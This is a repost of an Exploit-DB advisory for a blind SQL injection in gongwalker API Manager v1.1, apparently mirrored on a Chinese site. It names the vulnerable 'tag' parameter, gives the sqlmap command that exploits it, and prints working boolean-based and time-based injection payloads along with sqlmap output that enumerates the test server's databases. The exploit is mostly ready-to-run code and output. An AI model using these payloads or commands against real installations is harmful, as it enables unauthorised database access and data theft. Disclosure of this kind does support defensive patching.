Gongwalker API Manager 1.1 – Blind SQL Injection - 体验盒子

作者： HaHwul
日期： 2016-01-26
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/39320/
gongwalker API Manager v1.1 - Blind SQL Injection

# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
# Date: 2016-01-25
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/gongwalker/ApiManager
# Software Link: https://github.com/gongwalker/ApiManager.git
# Version: v1.1
# Tested on: Debian

# =================== Vulnerability Description =================== #
Api Manager's index.php used tag parameters is vulnerable
http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1

# ========================= SqlMap Query ========================== #
sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag

# ================= SqlMap Result(get My Test DB) ================= #
Parameter: tag (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
---
[21:14:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[21:14:21] [INFO] fetching database names
[21:14:21] [INFO] fetching number of databases
[21:14:21] [INFO] resumed: 25
[21:14:21] [INFO] resumed: information_schema
[21:14:21] [INFO] resumed: "
[21:14:21] [INFO] resumed: ""
[21:14:21] [INFO] resumed: '
[21:14:21] [INFO] resumed: ''
[21:14:21] [INFO] resumed: '''
[21:14:21] [INFO] resumed: api
[21:14:21] [INFO] resumed: blackcat
[21:14:21] [INFO] resumed: edusec

...